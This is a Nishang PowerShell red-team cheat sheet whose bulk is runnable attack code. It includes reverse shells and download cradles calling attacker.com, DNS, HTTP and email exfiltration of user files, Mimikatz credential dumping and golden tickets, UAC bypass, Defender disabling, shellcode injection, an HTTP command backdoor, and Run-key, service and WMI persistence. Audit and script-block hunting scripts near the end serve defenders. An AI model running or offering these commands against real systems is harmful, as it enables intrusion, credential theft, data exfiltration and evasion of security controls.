
Nishang

Nishang is a comprehensive PowerShell offensive security framework developed for red team operations and penetration testing. It provides a collection of scripts and tools for reconnaissance, exploitation, and post-exploitation activities on Windows systems. Nishang leverages PowerShell’s native capabilities to execute attacks directly from memory without writing to disk, making it difficult to detect via traditional endpoint protection.

The framework includes backdoors, credential harvesters, information gatherers, privilege escalation exploits, and lateral movement tools. It’s designed for authorized penetration testing and red team exercises in controlled environments.

```bash
git clone https://github.com/samratashok/nishang.git
cd nishang
```
```text
nishang/
├── Antak-WebShell/
├── Apphunter/
├── Backdoors/
├── Escalation/
├── Execution/
├── Exfiltration/
├── Gather/
├── Lateral-Movement/
├── MITM/
├── Persistence/
├── Powerpreter/
├── Shells/
└── Utils/
```
```powershell
# Check PowerShell version
$PSVersionTable.PSVersion

# Recommended: PowerShell 3.0 or later
# Windows 7+: Get Update for .NET Framework and PowerShell
```

```powershell
# Bypass execution policy for the current session only
# (Process scope; -Scope CurrentUser would persist the change in the registry)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
powershell -ExecutionPolicy Bypass
```
| Module | Category | Purpose |
|---|---|---|
| Invoke-PowerShellTcp | Backdoor/Shell | Reverse PowerShell shell |
| Invoke-PowerShellIcmp | Backdoor/Shell | ICMP-based reverse shell |
| Invoke-PsGcat | Backdoor/Shell | DNS exfiltration shell |
| Invoke-PowerShellUsb | Backdoor/Shell | USB-based persistence |
| Copy-VSS | Exfiltration | Extract copies of files via VSS |
| Invoke-CredentialInjection | Post-Exploitation | Inject credentials into processes |
| Get-Information | Reconnaissance | Gather system information |
| Get-WLAN-Keys | Credential Theft | Extract wireless network passwords |
| Invoke-Mimikatz | Credential Dumping | Dump credentials from memory |
| Invoke-Kerberoast | Privilege Escalation | Extract Kerberos tickets |
| Invoke-TokenDuplication | Privilege Escalation | Token impersonation |
| Invoke-ServiceAbuse | Lateral Movement | Abuse Windows services for movement |
| Invoke-PSRemoting | Lateral Movement | Use PS remoting for lateral movement |
```bash
# In Nishang/Shells/ directory
# On attacker machine - start listener
nc -lvnp 4444

# On target - execute reverse shell
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"
```

```bash
# Uses ICMP packets for stealth
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress 192.168.1.100"
```

```bash
# Exfiltrate data over DNS
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PsGcat.ps1'); Invoke-PsGcat -Command 'whoami' -Domain attacker.com"
```

```text
# Web-based shell in IIS
# Upload Antak-WebShell files to IIS directory
# Access via: http://target/antak/
# Provides GUI PowerShell execution interface
```

```bash
# Alternative to netcat for reverse communication
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellHTTP.ps1'); Invoke-PowerShellHTTP -Reverse -IPAddress 192.168.1.100 -Port 80"
```
```powershell
# Load Nishang module
. ./Gather/Get-Information.ps1
Get-Information
```

```powershell
# Gather all system details
Get-Information | Format-List

# Output includes:
# - OS version
# - System architecture
# - Installed software
# - Network configuration
# - Logged-in users
# - Security software
```

```powershell
# Network adapter details
Get-NetAdapter
Get-NetIPConfiguration

# Active connections
netstat -ano
Get-NetTCPConnection
```

```powershell
# Local users
Get-LocalUser

# Local groups
Get-LocalGroup

# Group members
Get-LocalGroupMember -Name "Administrators"

# Domain info (if joined)
Get-ADUser -Filter *
Get-ADGroup -Filter *
```

```powershell
# Extract saved WLAN passwords
. ./Gather/Get-WLAN-Keys.ps1
Get-WLAN-Keys

# Displays: SSID, Network Type, Authentication, Encryption, Password
```

```powershell
# Chrome/Edge saved credentials and history
Get-ChromeLogins
Get-ChromeHistory

# Firefox credentials
Get-FirefoxLogins

# Stored credentials
cmdkey /list
Get-Credential
```

```powershell
# Dump credentials from memory
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

# Extract NTLM hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:CORP /ntlm:hash /run:cmd.exe"'

# Golden ticket creation
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21-x-x-x /krbtgt:hash /id:500"'
```
```powershell
# Load token impersonation module
. ./Escalation/Invoke-TokenDuplication.ps1

# Get available tokens
Get-ProcessToken

# Duplicate and impersonate token
Invoke-TokenDuplication -ProcessId 1234 -ImpersonationLevel Impersonation
```

```powershell
# Inject credentials into process
. ./Escalation/Invoke-CredentialInjection.ps1

# Inject and spawn process
Invoke-CredentialInjection -Target "notepad.exe" -Username "DOMAIN\Administrator" -Password "Password123" -Domain "DOMAIN"
```

```powershell
# Various UAC bypass methods
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass -Technique "EventVwr"

# Other techniques:
# - Registry Modification
# - COM Handler Hijacking
# - Scheduled Task Abuse
# - Token Duplication
```

```powershell
# Abuse misconfigured services
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1

# Find vulnerable services
Get-Service | Where-Object {$_.StartType -eq "Disabled"}

# Abuse service for code execution
Invoke-ServiceAbuse -ServiceName "VulnerableService" -Command "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
```

```powershell
# Extract service principal names (SPNs)
. ./Escalation/Invoke-Kerberoast.ps1
Invoke-Kerberoast

# Extract TGS tickets for offline cracking
Invoke-Kerberoast -OutputFormat HashCat

# Crack with hashcat
hashcat -m 13100 krb5_tgs_dump.txt wordlist.txt
```

```powershell
# Windows privilege escalation
# Combines NBNS spoofing and NTLM relay
. ./Escalation/Invoke-HotPotato.ps1
Invoke-HotPotato
```
```powershell
# Enable remoting (requires admin)
Enable-PSRemoting -Force

# Create PSSession to remote host
$session = New-PSSession -ComputerName remote.corp.com -Credential (Get-Credential)

# Execute commands
Invoke-Command -Session $session -ScriptBlock {whoami; hostname}

# Copy files over PSSession
Copy-Item -Path "C:\local\file.txt" -Destination "C:\remote\" -ToSession $session
```

```powershell
# Execute commands via WMI
$cred = Get-Credential
$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName remote.corp.com -SessionOption $options -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd /c powershell..."}
```

```powershell
# Find and abuse services on remote host
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1
Invoke-ServiceAbuse -ComputerName "remote.corp.com" -ServiceName "vulnerable-service"
```

```powershell
# Copy files using Volume Shadow Copy (VSS)
. ./Exfiltration/Copy-VSS.ps1
Copy-VSS -FileName "C:\Windows\System32\drivers\etc\hosts"

# Exfiltrate sensitive files
Copy-VSS -FileName "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data"
```
```powershell
# Add run key for startup persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
```

```powershell
# Create scheduled task running as SYSTEM
$trigger = New-ScheduledTaskTrigger -AtStartup
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
Register-ScheduledTask -TaskName "Windows Update" -Trigger $trigger -Action $action -RunLevel Highest
```

```powershell
# Create malicious Windows service
# Requires admin privileges
New-Service -Name "UpdateService" -BinaryPathName "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" -StartupType Automatic
```

```powershell
# Place script in startup folder
Copy-Item -Path "shell.ps1" -Destination "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
```

```powershell
# WMI-based persistence (difficult to detect)
$EventFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\cimv2" -Arguments @{Name="Updater"; EventNamespace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}

$EventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\cimv2" -Arguments @{Name="Updater"; CommandLineTemplate="powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"}

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\cimv2" -Arguments @{Filter=$EventFilter; Consumer=$EventConsumer}
```
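Every persistence technique above (Run key, scheduled task, service, startup folder, WMI subscription) leaves an entry that can be enumerated from the same host. The audit script below is an added example, not part of Nishang; the regex of suspicious patterns is an assumption distilled from the one-liners on this page, and flagging every script in a startup folder is a deliberate choice rather than a pattern match.

```powershell
# Added audit example: enumerate the persistence locations used above and flag in-memory download cradles.
# Assumption: $Suspicious is built from this page's one-liners and is not a complete signature set.
$Suspicious = 'DownloadString|Invoke-Expression|\bIEX\b|-ExecutionPolicy\s+Bypass|-nop\b|-w(indowstyle)?\s+hidden|FromBase64String'
$findings   = [System.Collections.Generic.List[object]]::new()

function Add-Finding([string]$Source, [string]$Name, [string]$Command, [switch]$Always) {
    if ($Always -or ($Command -and $Command -match $Suspicious)) {
        $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Command = $Command })
    }
}

# 1. Run / RunOnce keys for the current user and for the machine
foreach ($hive in 'HKCU', 'HKLM') {
    foreach ($key in 'Run', 'RunOnce') {
        $path = "$($hive):\Software\Microsoft\Windows\CurrentVersion\$key"
        if (-not (Test-Path $path)) { continue }
        (Get-ItemProperty -Path $path).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |          # drop the PSPath/PSParentPath bookkeeping properties
            ForEach-Object { Add-Finding "$hive\$key" $_.Name $_.Value }
    }
}

# 2. Scheduled task actions whose executable + arguments form a download cradle
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) { Add-Finding 'ScheduledTask' $task.TaskName "$($a.Execute) $($a.Arguments)" }
}

# 3. Services whose binary path is a PowerShell one-liner instead of a real service binary
Get-CimInstance -ClassName Win32_Service | ForEach-Object { Add-Finding 'Service' $_.Name $_.PathName }

# 4. Startup folders: any script or shortcut here is worth review, so flag unconditionally
$startup = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
           "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
Get-ChildItem -Path $startup -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -in '.ps1', '.bat', '.cmd', '.vbs', '.lnk' } |
    ForEach-Object { Add-Finding 'StartupFolder' $_.Name $_.FullName -Always }

# 5. WMI permanent event consumers (normally root\subscription; the snippet above registers them in root\cimv2)
foreach ($ns in 'root\subscription', 'root\cimv2') {
    Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding "WMI:$ns" $_.Name $_.CommandLineTemplate }
}

$findings | Format-Table -AutoSize -Wrap
```

Run it elevated so that HKLM, all scheduled tasks and the WMI namespaces are readable; an empty table means none of the page's patterns were found, not that the host is clean.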
```powershell
# DNS-based exfiltration
. ./Exfiltration/Invoke-PsGcat.ps1
Invoke-PsGcat -Command "Get-ChildItem C:\ -Recurse | ConvertTo-Json" -Domain attacker.com

# HTTP-based exfiltration
$data = Get-ChildItem C:\ -Recurse
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-WebRequest -Uri "http://attacker.com/exfil" -Method POST -Body ($data | ConvertTo-Json)

# Email-based exfiltration
$smtp = New-Object Net.Mail.SmtpClient("attacker.com")
$mail = New-Object System.Net.Mail.MailMessage("attacker@attacker.com","admin@attacker.com")
$mail.Subject = "Stolen Data"
$mail.Body = (Get-ChildItem C:\Users\ | ConvertTo-Json)
$smtp.Send($mail)
```

```powershell
# Compress sensitive files
$files = Get-ChildItem -Path "C:\Users\Administrator\Documents" -Recurse
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\archive.zip"

# Exfiltrate compressed archive
$file = Get-Item "C:\Temp\archive.zip"
$request = [System.Net.WebRequest]::Create("http://attacker.com/upload")
# ... send file ...
```

```powershell
# Execute in-memory to avoid disk detection
IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')

# Obfuscate PowerShell commands
Invoke-Obfuscation -Type All -Path ".\script.ps1"

# Use CertUtil for file download (avoid WebClient)
certutil -urlcache -split -f "http://attacker.com/file.exe" output.exe
```

```powershell
# Inject shellcode into process memory
# Uses low-level APIs to bypass detection
. ./Execution/Invoke-ShellcodeMmap.ps1
Invoke-ShellcodeMmap -Shellcode @(0x90,0x90,...)

# Process hollowing for parent process spoofing
. ./Execution/Invoke-ProcessHollowing.ps1
Invoke-ProcessHollowing -ParentProcess "explorer.exe" -Shellcode $shellcode
```

```powershell
# Modify Windows Defender registry
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1

# Disable UAC
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0

# Modify Event Log settings
limitEventLogs -Log Security -MaxSize 1024000
```
```powershell
# Simple HTTP-based backdoor
$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://+:80/")
$listener.Start()

while($true) {
    $context = $listener.GetContext()
    $command = $context.Request.QueryString["cmd"]
    $output = Invoke-Expression $command | Out-String
    $response = $context.Response
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($output)
    $response.ContentLength64 = $buffer.Length
    $response.OutputStream.Write($buffer,0,$buffer.Length)
    $response.Close()
}
```

```powershell
# Bundle multiple information gathering scripts
. ./Gather/Get-Information.ps1
. ./Gather/Get-WLAN-Keys.ps1
. ./Gather/Invoke-Mimikatz.ps1

$results = @{
    SystemInfo = Get-Information
    WLANKeys = Get-WLAN-Keys
    Credentials = Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
}

$results | ConvertTo-Json | Out-File -Path "C:\Temp\enum.json"
```

```powershell
# 1. Initial compromise (reverse shell)
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"

# 2. Establish persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

# 3. Privilege escalation
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass

# 4. Lateral movement
$cred = Get-Credential
Invoke-Command -ComputerName remote.corp.com -Credential $cred -ScriptBlock {whoami}
```

```powershell
# 1. Dump credentials
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' > creds.txt

# 2. Extract plaintext passwords
Get-WLAN-Keys

# 3. Use for lateral movement
$cred = New-Object System.Management.Automation.PSCredential("DOMAIN\Admin", (ConvertTo-SecureString "Password" -AsPlainText -Force))
```
  • Nishang is for authorized penetration testing only
  • Obtain proper written authorization before use
  • Use in isolated lab environments or authorized networks
  • Monitor for suspicious PowerShell execution
  • Nishang scripts may be detected by EDR/AV solutions
  • Maintain audit trails and documentation
  • Follow responsible disclosure practices
```powershell
# Enable PowerShell module logging
# The policy key does not exist by default, so create it before setting the value
$ml = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging"
New-Item -Path $ml -Force | Out-Null
Set-ItemProperty -Path $ml -Name "EnableModuleLogging" -Value 1 -Type DWord
# Log every module ("*" in ModuleNames); without this list nothing is recorded
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$ml\ModuleNames" -Name "*" -Value "*"

# Enable script block logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational)
$sbl = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name "EnableScriptBlockLogging" -Value 1 -Type DWord

# Check PowerShell history: the current session's history and the PSReadLine history file on disk
Get-History
(Get-PSReadlineOption).HistorySavePath
Get-Content -Path (Get-PSReadlineOption).HistorySavePath
```

```powershell
# Hunt for suspicious PowerShell execution
# 4688 only contains the command line when "Include command line in process creation events" is enabled,
# and FilterHashtable's Data key matches whole field values, so filter on the message text instead
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} |
    Where-Object { $_.Message -match 'ExecutionPolicy\s+Bypass' }

# Look for remote PowerShell sessions
# Engine lifecycle events (400/600) in the classic log carry HostApplication; remoting sessions run under wsmprovhost.exe
Get-WinEvent -FilterHashtable @{LogName='Windows PowerShell'; ID=400,600} |
    Where-Object { $_.Message -match 'wsmprovhost' }
```
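Once script block logging is on, the Nishang cmdlets and download cradles used throughout this page show up verbatim in event 4104. The hunt below is an added example, not Nishang or Microsoft code; the function list and the cradle regex are assumptions taken from this page rather than a complete rule set.

```powershell
# Added hunting example: search 4104 script block events for the Nishang functions and cradles shown on this page.
# Assumption: $NishangFunctions and $Cradle are derived from this page and are not an exhaustive detection rule.
$NishangFunctions = 'Invoke-PowerShellTcp', 'Invoke-PowerShellIcmp', 'Invoke-PowerShellHTTP', 'Invoke-PsGcat',
                    'Invoke-Mimikatz', 'Invoke-TokenDuplication', 'Invoke-CredentialInjection', 'Invoke-Kerberoast',
                    'Invoke-ServiceAbuse', 'Copy-VSS', 'Get-WLAN-Keys', 'Get-Information'
$Cradle = 'Net\.WebClient.*DownloadString|Invoke-Expression|\bIEX\b|-ExecutionPolicy\s+Bypass'

function Get-SuspiciousScriptBlock([int]$Hours = 24) {
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; ID = 4104; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # ScriptBlockText lives in EventData; the rendered Message is truncated for long blocks, so read the XML
        $xml  = [xml]$_.ToXml()
        $text = ($xml.Event.EventData.Data | Where-Object { $_.Name -eq 'ScriptBlockText' }).'#text'
        if (-not $text) { return }                                   # skip events without a script body
        $hits   = $NishangFunctions | Where-Object { $text -match [regex]::Escape($_) }
        $cradle = $text -match $Cradle
        if ($hits -or $cradle) {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Computer  = $_.MachineName
                ProcessId = $_.ProcessId
                Functions = ($hits -join ', ')
                Cradle    = $cradle
                Snippet   = ($text.Substring(0, [Math]::Min(120, $text.Length)) -replace '\s+', ' ')
            }
        }
    }
}

Get-SuspiciousScriptBlock -Hours 72 | Format-Table -AutoSize -Wrap
```

Large scripts are split across several 4104 events, so a single hit may show only a fragment; pivot on ProcessId and Time to reassemble the rest of the block.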
  • Metasploit - General penetration testing framework
  • Empire - Alternative PowerShell exploitation framework
  • PoshC2 - Command and control over HTTP(S)
  • Covenant - .NET-based command and control
  • Mimikatz - Credential extraction tool (often integrated)